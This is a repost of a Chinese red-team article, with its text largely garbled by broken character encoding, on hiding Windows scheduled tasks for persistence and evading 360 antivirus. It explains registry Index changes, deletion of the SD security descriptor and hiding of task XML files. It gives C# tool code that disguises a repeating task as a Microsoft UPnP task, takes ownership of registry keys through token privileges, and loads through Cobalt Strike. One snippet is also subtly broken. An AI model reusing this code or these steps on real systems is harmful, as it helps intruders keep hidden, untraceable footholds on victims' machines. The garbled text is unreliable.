ÎÒÃÇ¶¼ÀÏoutÁËÖ®ÈÆ¹ýÌí¼Ó¼Æ»®ÈÎÎñ360ÎÀÊ¿À¹½Ø²¢Òþ²Ø¼Æ»®ÈÎÎñ

admin ·¢±íÓÚ 2024-4-1 22:58:59

Windows¼Æ»®ÈÎÎñµÄ½ø½×


Z2O°²È«¹¥·À <a href="javascript:void(0);">éÙÃ¨Ñ§°²È«</a> 2024-03-27 16:50 ±±¾©


ÎÄÕÂÕýÎÄ


 
 
 
±¾ÎÄ²ûÊöWindows¼Æ»®ÈÎÎñÔÚÏµÍ³ÖÐµÄÒþ²Ø·½Ê½¼°¹¤¾ß»¯µÄ×ª»»¡£


Ç°ÑÔ


¼Æ»®ÈÎÎñ×÷Îª³Ö¾Ã»¯µÄ»úÖÆÖ®Ò»£¬Ò²±»ÓÃÔÚºì¶ÓÐÐ¶¯ÖÐ¡£µ«³£¼ûµÄÀûÓÃ·½·¨ÔÚ±»°²È«Èí¼þ×è¶ÏµÄÍ¬Ê±£¬Ò²Ã»ÓÐ´ïµ½Òþ²ØÐ§¹û£¬²¢Ìá¸ßÁË±»·¢ÏÖµÄ·çÏÕ¡£ËùÒÔ£¬ÐèÒªÉîÈëÀí½âÀûÓÃ¼Æ»®ÈÎÎñ£¬¹æ±Ü·çÏÕ£¬´ïµ½³Ö¾Ã¿ØÖÆ¡£


Òþ²Ø


´´½¨¼Æ»®ÈÎÎñ


at.exe ÔÚ windows8 ¿ªÊ¼¾ÍÆúÓÃÁË£¬Ö®ºóµÄÏµÍ³¶¼ÊÇÊ¹ÓÃ schtasks.exe ´´½¨¼Æ»®ÈÎÎñ¡£schtasks ±È at ¸ü¼ÓÇ¿´ó£¬ Ê¹¹ÜÀíÔ±ÄÜ¹»ÔÚ±¾µØ»òÔ¶³Ì¼ÆËã»úÉÏ´´½¨¡¢É¾³ý¡¢²éÑ¯¡¢¸ü¸Ä¡¢ÔËÐÐºÍ½áÊø¼Æ»®ÈÎÎñ¡£ÔËÐÐ²»´ø²ÎÊýµÄ schtasks.exe ½«ÏÔÊ¾Ã¿¸öÒÑ×¢²áÈÎÎñµÄ×´Ì¬ºÍÏÂ´ÎÔËÐÐÊ±¼ä¡£¸ü¶à²é¿´ Microsoft ÎÄµµ


schtasks /Create  
]]] 
] /SC schedule   
  /TN taskname /TR taskrun  
 [ {/ET endtime | /DU duration}   
 ]     


ÃüÁîÐÐ


schtasks /create /tn TestSchtask /tr C:\Windows\System32\cmd.exe /sc DAILY /st 13:00:00


XML ÎÄ¼þ


¼Æ»®ÈÎÎñÒ»µ©´´½¨³É¹¦£¬½«»á×Ô¶¯ÔÚ %SystemRoot%\System32\Tasks Ä¿Â¼Éú³ÉÒ»¸ö¹ØÓÚ¸ÃÈÎÎñµÄÃèÊöÐÔ XML ÎÄ¼þ£¬°üº¬ÁËËùÓÐµÄÈÎÎñÐÅÏ¢¡£ÔËÐÐ taskschd.msc £¬Í¬Ê±¿ÉÒÔÔÚÈÎÎñ¼Æ»®³ÌÐò¿´µ½¸Õ²ÅËù´´½¨µÄÈÎÎñ£¬´¦ÔÚ³ÌÐò¿âµÄ¸ùÄ¿Â¼ÏÂ¡£<img width="554" height="281" src="http://cobjon.com/w/php/upload/202404/01/d9c1006f.png" alt="vshapes=" "="" style="vertical-align:middle;" />


×¢²á±í


ÔÚ Windows XP Ê±£¬¼Æ»®ÈÎÎñ×¢²á±íÂ·¾¶Îª


¼ÆËã»ú\HKEY_LOCAL_MACHINE\Software\Microsoft\SchedulingAgent\


Windows7 ÒÔºó±ä³É


¼ÆËã»ú\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\


ÒÔ Windows 10 ÎªÀý£¬²é¿´¸Õ²ÅËù´´½¨ÈÎÎñ¼Æ»®µÄ¼üÖµ£¬Â·¾¶£º¼ÆËã»ú\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TestTask<img width="554" height="139" src="http://cobjon.com/w/php/upload/202404/01/1043a16b.png" alt="vshapes=" "="" style="vertical-align:middle;" />Id {GUID}£¬ÈÎÎñ¶ÔÓ¦µÄguid±àºÅ¡£Index Ò»°ãÈÎÎñÖµÎª3£¬ÆäËûÖµÎ´Öª¡£SD Security Descriptor °²È«ÃèÊö·û£¬ÔÚWindowsÖÐ£¬Ã¿Ò»¸ö°²È«¶ÔÏóÊµÌå¶¼ÓµÓÐÒ»¸ö°²È«ÃèÊö·û£¬°²È«ÃèÊö·û°üº¬ÁË±»±£»¤¶ÔÏóÏà¹ØÁªµÄ°²È«ÐÅÏ¢µÄÊý¾Ý½á¹¹£¬ËüµÄ×÷ÓÃÖ÷ÒªÊÇÎªÁË¸ø²Ù×÷ÏµÍ³Ìá¹©ÅÐ¶ÏÀ´·Ã¶ÔÏóµÄÈ¨ÏÞ¡£¡¾ ¾²âÊÔ£ºWindows 7 ¡¢Windows Server 2008 ÎÞ SD Öµ¡¢Windows 10 ÓÐ SD Öµ ¡¿


°²È«Èí¼þ×èÖ¹


Èç¹ûÖ÷»ú´æÔÚ°²È«Èí¼þ£¬¼Æ»®ÈÎÎñµÄ´´½¨»á±»×èÖ¹£¬ÃüÁîÐÐÎÞ·¨³É¹¦´´½¨¡££¨¿ÉÍ¨¹ý ¼Æ»®ÈÎÎñAPI ÈÆ¹ý£¬¹¤¾ß»¯ÀûÓÃ´Ëµã£©schtasks /create /tn "TestTask" /ru system /tr C:\Windows\System32\cmd.exe /sc weekly /d mon /st 01:00<img width="553" height="395" src="http://cobjon.com/w/php/upload/202404/01/f6952c22.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Òþ²Ø×ËÊÆ


·ÇÍêÈ«Òþ²Ø


·ÇÍêÈ«Òþ²ØÒ»¸ö¼Æ»®ÈÎÎñ£¬Í¨¹ýÐÞ¸Ä \Schedule\TaskCache\Tree ÏÂ¶ÔÓ¦ÈÎÎñµÄ Index Öµ£¬Ò»°ãÇé¿öÏÂÖµÎª 3 ¡£


Index ÐÞ¸Ä

<ul style="margin-top:0cm;" type="circle">
<li style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
• ÐÞ¸Ä HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{TaskName} ÏÂ¶ÔÓ¦ÈÎÎñµÄ Index ÖµÎª 0
</li>
</ul>

ÒÔ Windows 10 ÎªÀý£¬ÐÂ½¨¼Æ»®ÈÎÎñ cmd µÄ¸ß¼¶°²È«ÉèÖÃÖÐËùÓÐÕßÎª SYSTEM£¬Ä¬ÈÏÎÞ·¨¸ü¸Ä×¢²á±í¼üÖµ¡£<img width="532" height="242" src="http://cobjon.com/w/php/upload/202404/01/0fd63984.png" alt="vshapes=" "="" style="vertical-align:middle;" /><img width="554" height="339" src="http://cobjon.com/w/php/upload/202404/01/bc22aaa5.png" alt="vshapes=" "="" style="vertical-align:middle;" />¸ü¸ÄËùÓÐÕßÎª Administrators£¬²¢¸³ÓèÍêÈ«¿ØÖÆÈ¨ÏÞ£¬²ÅÄÜÐÞ¸Ä×¢²á±í¼üÖµ¡£<img width="533" height="540" src="http://cobjon.com/w/php/upload/202404/01/a51d0740.png" alt="vshapes=" "="" style="vertical-align:middle;" />µ± Index ÐÞ¸ÄÎª 0 ºó£¬ ÀûÓÃ taskschd.msc¡¢schtasks.exe ¡¢ÉõÖÁÏµÍ³API²éÑ¯³öµÄËùÓÐÈÎÎñÖÐ£¬¶¼²é¿´²»µ½Ëù´´½¨µÄÈÎÎñ¡£µ«Èç¹ûÖªµÀ¸ÃÈÎÎñÃû³Æ£¬¿ÉÒÔÍ¨¹ý schtasks /query /tn {TaskName Path} ²éµ½¡£<img width="554" height="184" src="http://cobjon.com/w/php/upload/202404/01/878cab54.png" alt="vshapes=" "="" style="vertical-align:middle;" />µ«ÔÚ Windows Server 2008 Óë Windows 7 ÖÐ£¬ÐÞ¸Ä Index ¼üÖµÎª 0 £¬ÈÎÎñ¼Æ»®³ÌÐòÖÐÈÔ´æÔÚ¸ÃÈÎÎñ¡£ÔÒòÎ´Öª<img width="554" height="194" src="http://cobjon.com/w/php/upload/202404/01/3a9b1c98.png" alt="vshapes=" "="" style="vertical-align:middle;" />


XML ÎÄ¼þÉ¾³ý

<ul style="margin-top:0cm;" type="circle">
<li style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
• É¾³ý %SystemRoot%\System32\Tasks ÏÂÈÎÎñ¶ÔÓ¦µÄ XML ÎÄ¼þ
</li>
</ul>

1.    1. ÔÚ Windows 10 ÖÐ£¬É¾³ý XML ÎÄ¼þ£¬²¢²»Ó°Ïì¼Æ»®ÈÎÎñµÄÔËÐÐ£¬ÇÒÔÚ taskschd.msc ÈÎÎñ¼Æ»®³ÌÐòÖÐ£¬ÒÀÈ»´æÔÚ¶ÔÓ¦ÈÎÎñ£»


2.    2. ÔÚ Windows 7 Óë Windows Server 2008 ÖÐ£¬ÈôÉ¾³ý XML ÎÄ¼þ£¬ÈÎÎñ¼Æ»®³ÌÐòÖÐµÄ¶ÔÓ¦ÈÎÎñÒ²»á±»É¾³ý£¬²¢ÇÒÓ°Ïì¼Æ»®ÈÎÎñµÄÔËÐÐ£¬µ«×¢²á±íÖÐÏîÖµÒÀÈ»´æÔÚ¡£


ÍêÈ«Òþ²Ø


SD É¾³ý

<ul style="margin-top:0cm;" type="circle">
<li style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
• É¾³ý HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{TaskName}\SD
</li>
<li style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
• É¾³ý %SystemRoot%\System32\Tasks ÏÂÈÎÎñ¶ÔÓ¦µÄ XML ÎÄ¼þ
</li>
</ul>

ÕâÑù²Ù×÷£¬ÎÞÂÛºÎÖÖ·½Ê½ (ÅÅ³ý×¢²á±í) ¶¼²é²»µ½¸ÃÈÎÎñ£¬½ÏÎª³¹µ×¡£ÒòÎª SD ¾ÍÊÇ°²È«ÃèÊö·û£¬ËüµÄ×÷ÓÃÖ÷ÒªÊÇÎªÁË¸ø²Ù×÷ÏµÍ³Ìá¹©ÅÐ¶ÏÀ´·Ã¶ÔÏóµÄÈ¨ÏÞ£¬µ«±»É¾³ýºó£¬ÎÞ·¨ÅÐ¶ÏÓÃ»§ÊÇ·ñÓÐÈ¨ÏÞ²é¿´¸ÃÈÎÎñÐÅÏ¢£¬µ¼ÖÂÏµÍ³Ö±½ÓÅÐ¶ÏÎÞÈ¨ÏÞ²é¿´¡£Òò´ËÔÚÊ¹ÓÃ schtasks /query /tn \Microsoft\Windows\AppID\cmd ²éÑ¯Ê±£¬ÌáÊ¾¡°´íÎó: ÏµÍ³ÕÒ²»µ½Ö¸¶¨µÄÎÄ¼þ¡±¡£µ«¾¹ý²âÊÔ£¬Windows 7 ¡¢Windows Server 2008 ÎÞ SD Öµ¡¢Windows 10 ÓÐ SD Öµ¡£<img width="554" height="233" src="http://cobjon.com/w/php/upload/202404/01/b51dab93.png" alt="vshapes=" "="" style="vertical-align:middle;" />


×Ü½á


Windows ¼Æ»®ÈÎÎñµÄÒþ²Ø²¢Î´¾ø¶Ô£¬Òò²Ù×÷ÏµÍ³´æÔÚ²îÒì£¬×îÖÕÊµÏÖµÄÐ§¹ûÒ²²»Í¬¡£µ«×÷Îª³Ö¾Ã»¯µÄ»úÖÆÖ®Ò»£¬ÐèÒªÉîÈëÀí½âÀûÓÃ¡£

<div align="left" style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">

<hr size="2" width="100%" noshade="noshade" style="color:black;" align="left" />

</div>

¹¤¾ß»¯


Ö÷ÒªÒÔ¼Æ»®ÈÎÎñµÄ´úÂë¿ª·¢ÎªÖ÷£¬½«ÊÖ¹¤»¯×ª±äÎª¹¤¾ß»¯¡£


Ð§¹ûÍ¼


<img width="554" height="317" src="http://cobjon.com/w/php/upload/202404/01/b1976e9d.png" alt="vshapes=" "="" style="vertical-align:middle;" /><img width="554" height="317" src="http://cobjon.com/w/php/upload/202404/01/7c8ed4f4.png" alt="vshapes=" "="" style="vertical-align:middle;" />


ÊµÏÖ²½Öè


1.    1. Ñ¡ÔñÖ÷»úËæ»ú½ø³ÌÃû×÷Îª¼Æ»®ÈÎÎñ³ÌÐòÎÄ¼þÃû


2.    2. ½«¼Æ»®ÈÎÎñ³ÌÐòÎÄ¼þ¸´ÖÆµ½ %AppData%\Microsoft\Windows\Themes\ ÖÐ


3.    3. ´´½¨µÄ¼Æ»®ÈÎÎñÃûÈ¡Í¬Ò»Ëæ»ú½ø³ÌÃû


4.    4. ¼Æ»®ÈÎÎñ´¥·¢Æ÷ÒÔ·ÖÖÓÎªµ¥Î»£¬ÎÞÏÞÆÚ³ÖÐø


5.    5. ¸ü¸Ä Index¡¢É¾³ý SD µÄ¼üÖµ£¬Òþ²Ø¼Æ»®ÈÎÎñ¶ÔÓ¦µÄ XML ÎÄ¼þ


6.    6. É¾³ýÒÑÌí¼ÓµÄ¼Æ»®ÈÎÎñ


±àÐ´´úÂë


±àÐ´ÈÎÎñ¼Æ»®µÄ¹¤¾ß£¬ÐèÒªÓÃµ½ÈÎÎñ¼Æ»®API£ºMicrosoft.Win32.TaskScheduler.dll¡£ÔÚ Visual Studio ÖÐ£¬¿ÉÒÔÖ±½Ó´ÓNuGet³ÌÐò°üÖÐ°²×°»ñÈ¡¡£ 
µ±È»£¬Ò²¿ÉÒÔ´Ó GitHub TaskScheduler ÖÐÏÂÔØ»ñÈ¡¡£<img width="554" height="197" src="http://cobjon.com/w/php/upload/202404/01/2d511a55.png" alt="vshapes=" "="" style="vertical-align:middle;" />


Ëæ»ú½ø³ÌÃû


Ñ¡ÔñÖ÷»úËæ»ú½ø³ÌÃû£¬×÷Îª¼Æ»®ÈÎÎñ³ÌÐòÎÄ¼þÃûÓë¼Æ»®ÈÎÎñÃû£¬Ö÷ÒªÎªÁËÃ¿´ÎÔËÐÐÃû³Æ¶¼Ëæ»ú£¬·ÀÖ¹ºóÐø±»ËÝÔ´£¬²¢ÇÒÈ¡Ëæ»ú½ø³ÌÃû£¬Ò²ÊÇÒ»ÖÖÒþÄä¡£


//Ñ¡ÔñÖ÷»úËæ»ú½ø³ÌÃû 
Process[] progresses = Process.GetProcesses(); 
Random random = new Random(); 
string randomname = (progresses.ProcessName);


´´½¨¼Æ»®ÈÎÎñ


´¥·¢Æ÷ÒÔ·ÖÖÓÎªµ¥Î»£¬ÎÞÏÞÆÚ³ÖÐøµÄÔËÐÐËù´´½¨µÄ¼Æ»®ÈÎÎñ£¬Ö÷ÒªÊÇÎªÁËÈ¨ÏÞµÄ³Ö¾ÃÐÔ¡£Èç¹ûËµÖ»ÔËÐÐÒ»´Î»ò³ÖÐøÊ±¼äÎªÒ»Ìì£¬ÄÇ¶ÔÓÚÈ¨ÏÞµÄÎ¬³Ö¿ÉÒÔËµÊÇºÁÎÞÒâÒå¡£¼Æ»®ÈÎÎñµÄ´´½¨Ã»ÓÐ·ÅÔÚ¸ùÂ·¾¶ÏÂ£¬¶øÊÇ´´½¨ÔÚ\Microsoft\Windows\UPnP\ Â·¾¶ÏÂ£¬´ïµ½ÒþÄä¡£


//´´½¨¼Æ»®ÈÎÎñ 
public static void CreateTask(string randomname, string destinationFile, string min) 
{ 
    TaskDefinition td = TaskService.Instance.NewTask(); 
    td.RegistrationInfo.Author = "Microsoft"; //´´½¨Õß 
    td.RegistrationInfo.Description = "UPnPHost Service Settings"; //ÃèÊö 
    //¼Æ»®ÈÎÎñÔËÐÐÊ±¼ä Min/ÎÞÏÞÆÚ 
    double time = double.Parse(min); 
    TimeTrigger tt = new TimeTrigger(); 
    tt.StartBoundary = DateTime.Now; 
    tt.Repetition.Interval = TimeSpan.FromMinutes(time); 
 
    td.Triggers.Add(tt); 
    td.Actions.Add(destinationFile, null, null); 
    string taskpath = @"\Microsoft\Windows\UPnP\" + randomname; 
    TaskService.Instance.RootFolder.RegisterTaskDefinition(taskpath, definition: td, TaskCreation.CreateOrUpdate, null, null, 0); 
}


Òþ²Ø¼Æ»®ÈÎÎñ


XML ÎÄ¼þÒþ²Ø


ÎÄÖÐÒÑ¾Ëµ¹ý£º


1.    1. ÔÚ Windows 10 ÖÐ£¬É¾³ý XML ÎÄ¼þ£¬²¢²»Ó°Ïì¼Æ»®ÈÎÎñµÄÔËÐÐ£¬ÇÒÔÚ taskschd.msc ÈÎÎñ¼Æ»®³ÌÐòÖÐ£¬ÒÀÈ»´æÔÚ¶ÔÓ¦ÈÎÎñ£»


2.    2. ÔÚ Windows 7 Óë Windows Server 2008 ÖÐ£¬ÈôÉ¾³ý XML ÎÄ¼þ£¬ÈÎÎñ¼Æ»®³ÌÐòÖÐµÄ¶ÔÓ¦ÈÎÎñÒ²»á±»É¾³ý£¬²¢ÇÒÓ°Ïì¼Æ»®ÈÎÎñµÄÔËÐÐ¡£


ÎªÁË³ÌÐòµÄ¿ÉÓÃÐÔ£¬ÕâÀïÖ»ÄÜ½« XML ÎÄ¼þ½øÐÐÒþ²Ø£¬¶ø²»ÊÇÉ¾³ý¡£


//Òþ²Ø %SystemRoot%\System32\Tasks ÏÂ¼Æ»®ÈÎÎñ¶ÔÓ¦µÄ XML ÎÄ¼þ 
public static void HidXml(string taskpath) 
{ 
    string xml = $@"C:\Windows\System32\Tasks" + taskpath; 
    FileInfo info = new FileInfo(xml); 
    if (info.Exists) 
    { 
        info.Attributes = FileAttributes.Hidden; 
        Console.WriteLine($"[*] Hidden task xml file: \n{xml}"); 
    } 
}


Index ÐÞ¸Ä


Í¨¹ýÐÞ¸Ä HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{TaskName} ÏÂ¶ÔÓ¦ÈÎÎñµÄ Index ÖµÎª 0ºó£¬ÀûÓÃ taskschd.msc¡¢schtasks.exe ¡¢API ¶¼²é¿´²»µ½Ëù´´½¨µÄÈÎÎñ¡£Ê×ÏÈÐèÒª¸ü¸Ä×¢²á±í¶ÔÓ¦¼Æ»®ÈÎÎñÏîÖµµÄ¸ß¼¶°²È«ÉèÖÃÖÐµÄËùÓÐÕß¡£ÔÚÎ´»ñÈ¡ÌØÈ¨Ä£Ê½ÏÂ£¬¹¤¾ßÔËÐÐºóÌáÊ¾¡°¾Ü¾ø·ÃÎÊ¡±£¬ÕâÏÔÈ»ÊÇÈ¨ÏÞ²»×ã¡£<img width="554" height="93" src="http://cobjon.com/w/php/upload/202404/01/b8baf2d9.png" alt="vshapes=" "="" style="vertical-align:middle;" />¿ÉÒÔÊ¹ÓÃ TokenManipulator Àà £¬´Ó¶ø»ñÈ¡ÌØÈ¨Ä£Ê½¡£Õâ¾ÍÐèÒªÔÚÏîÄ¿ÖÐÌí¼ÓÒ»¸öÐÂµÄC#Àà£¬Ö®ºóÔÚÍ·²¿ using CosmosKey.Utils; ¡£


try 
{ 
    TokenManipulator.AddPrivilege("SeRestorePrivilege"); 
    TokenManipulator.AddPrivilege("SeBackupPrivilege"); 
    TokenManipulator.AddPrivilege("SeTakeOwnershipPrivilege"); 
 
    var subKey = Registry.ClassesRoot.OpenSubKey(@"AppID\{9CA88EE3-ACB7-47c8-AFC4-AB702511C276}", RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.TakeOwnership); 
    // code to change owner... 
} 
finally 
{ 
    TokenManipulator.RemovePrivilege("SeRestorePrivilege"); 
    TokenManipulator.RemovePrivilege("SeBackupPrivilege"); 
    TokenManipulator.RemovePrivilege("SeTakeOwnershipPrivilege"); 
}


»ñÈ¡ÌØÈ¨Ä£Ê½ºó£¬¸ü¸Ä×¢²á±íÏîÖµµÄËùÓÐÕßÎª Administrators£¬Í¬Ê±Òª¸ü¸Ä×¢²á±íÏîÖµµÄÈ¨ÏÞ£¬Õâ²ÅÄÜ¶Ô Index ½øÐÐÐÞ¸Ä²Ù×÷¡£


//¸ü¸Ä×¢²á±íÏîÖµµÄËùÓÐÕß 
RegistryKey subKey = Registry.LocalMachine.OpenSubKey(regpath,RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRightsTakeOwnership); 
RegistrySecurity rs = new RegistrySecurity(); 
//ÉèÖÃ°²È«ÐÔµÄËùÓÐÕßÎªAdministrators 
rs.SetOwner(new NTAccount("Administrators")); 
//Îª×¢²á±íÏîÉèÖÃÈ¨ÏÞ 
subKey.SetAccessControl(rs); 
 
//¸ü¸Ä×¢²á±íÏîÖµµÄÈ¨ÏÞ 
RegistryAccessRule rar = new RegistryAccessRule("Administrators",RegistryRights.FullControl, AccessControlType.Allow); 
rs.AddAccessRule(rar); 
subKey.SetAccessControl(rs); 
subKey.Close();


SD É¾³ý


SD ¼üÖµµÄÉ¾³ý£¬ÊÇ¼Æ»®ÈÎÎñÍêÈ«Òþ²ØÏîÖ®Ò»£¬µ±È»ÒªÅÅ³ýÔÚ×¢²á±íÖÐ²é¿´¡£µ«¾¹ý²âÊÔ£¬Windows 7 ¡¢Windows Server 2008 ÎÞ SD Öµ¡¢Windows 10 ÓÐ SD Öµ¡£ËùÒÔ¾ÍÒª×ö if µÄÅÐ¶Ï£¬ÒÔÃâ³ÌÐò±¨´í¡£


//ÅÐ¶ÏSD¼üÖµÊÇ·ñ´æÔÚ£¨Win7 Óë win2008 ÎÞSD£© 
public static void RegeditKeyExist(string regpath) 
{ 
    string[] subkeyNames; 
    RegistryKey sd = Registry.LocalMachine.OpenSubKey(regpath, true); 
    subkeyNames = sd.GetValueNames(); 
    foreach (string keyName in subkeyNames) 
    { 
        if (keyName == "SD") 
        { 
            sd.DeleteValue("SD"); 
            sd.Close(); 
            return; 
        } 
    } 
    sd.Close(); 
    return; 
}


É¾³ý¼Æ»®ÈÎÎñ


ÐÞ¸Ä×¢²á±íÖÐµÄ¼üÖµ Index Óë SD ºó£¬ÈÎÎñ¼Æ»®³ÌÐòÖÐ¾Í²é¿´²»µ½¸ÃÈÎÎñ¡£Í¨¹ý TaskCollection Ò²ÎÞ·¨²éµ½´ËÈÎÎñ£¬¾ÍÎÞ·¨É¾³ýËù´´½¨µÄ¼Æ»®ÈÎÎñ¡£ËùÒÔ£¬ÎªÁË¹¤¾ßµÄÍêÕûÐÔ£¬É¾³ý´úÂëÖ»×ö²Î¿¼£¬²¢Î´ÒýÓÃµ½³ÌÐòÖÐ¡£<img width="554" height="160" src="http://cobjon.com/w/php/upload/202404/01/0aa8aa58.png" alt="vshapes=" "="" style="vertical-align:middle;" />


//É¾³ý¼Æ»®ÈÎÎñ (ÐèÒª¹ÜÀíÔ±È¨ÏÞ) 
public static void DeleteTask(string taskname) 
{ 
    //²»ÒªÐ´³É "\Microsoft\Windows\UPnP\" ¡ª ±¨´í ¡ª ÕÒ²»µ½ 
    string taskpath = @"\Microsoft\Windows\UPnP"; 
    //»ñµÃ¼Æ»®ÈÎÎñ 
    TaskService ts = new TaskService(); 
    TaskCollection tc = ts.GetFolder(taskpath).GetTasks(); 
    //Console.WriteLine($"{tc}"); 
    if (tc.Exists(taskname)) 
    { 
        string dtask = taskpath + "\\" + taskname; 
        ts.RootFolder.DeleteTask(dtask); 
        Console.WriteLine("\n[+] Successfully delete scheduled task !"); 
    } 
    else 
    { 
        Console.WriteLine("\n[!] Please add scheduled task !"); 
    } 
}


DLLÎÄ¼þ´ò°üµ½EXE


ÒýÓÃµÄ Microsoft.Win32.TaskScheduler.dll ²¢²»ÄÜÖ±½Ó±àÒëµ½³ÌÐòÖÐ£¬Ã¿´ÎÔËÐÐ¾ÍÐèÒª SchTask.exe ÓëMicrosoft.Win32.TaskScheduler.dll ÔÚÍ¬Ò»Ä¿Â¼ÏÂ£¬·ñÔòÔËÐÐ¾Í»á±¨´í¡£¿ÉÒÔÊ¹ÓÃ ILMerge ½« .Net µÄ DLL ÎÄ¼þ´ò°üµ½ EXE ÖÐ£¬Ö±½ÓÔÚ Visual Studio ÖÐÊ¹ÓÃ NuGet ³ÌÐò°ü¹ÜÀíÏÂÔØ°²×°¼´¿É¡£Ò²¿ÉÒÔÊ¹ÓÃ ILMerge-GUI Í¼ÐÎ»¯°æ±¾´ò°ü£¬¸ü¼Ó·½±ã¡£<img width="554" height="483" src="http://cobjon.com/w/php/upload/202404/01/8acebe01.png" alt="vshapes=" "="" style="vertical-align:middle;" />³ÌÐò´ò°üºó£¬ÔÚ CobaltStrike ÖÐÀûÓÃ execute-assembly ¿ÉÒÔ³É¹¦ÔÚÄÚ´æÖÐ¼ÓÔØÔËÐÐ¡£<img width="554" height="217" src="http://cobjon.com/w/php/upload/202404/01/e4076b72.png" alt="vshapes=" "="" style="vertical-align:middle;" />

<div align="left" style="font-family:µÈÏß;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">

<hr size="2" width="100%" noshade="noshade" style="color:black;" align="left" />

</div>

 
ÔÎÄÁ´½Ó https://payloads.cn/2021/0805/advanced-windows-scheduled-tasks.html£¬±¾ÎÄ×ª×ÔZ2O°²È«¹¥·À£¬ÈçÓÐÇÖÈ¨£¬ÇëÁªÏµÉ¾³ý¡£¹¤¾ßµØÖ·£ºhttps://github.com/0x727/SchTask_0x727


ÈçÓÐÇÖÈ¨£¬ÇëÁªÏµÉ¾³ý

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

ÎÒÃÇ¶¼ÀÏoutÁËÖ®ÈÆ¹ýÌí¼Ó¼Æ»®ÈÎÎñ360ÎÀÊ¿À¹½Ø²¢Òþ²Ø¼Æ»®ÈÎÎñ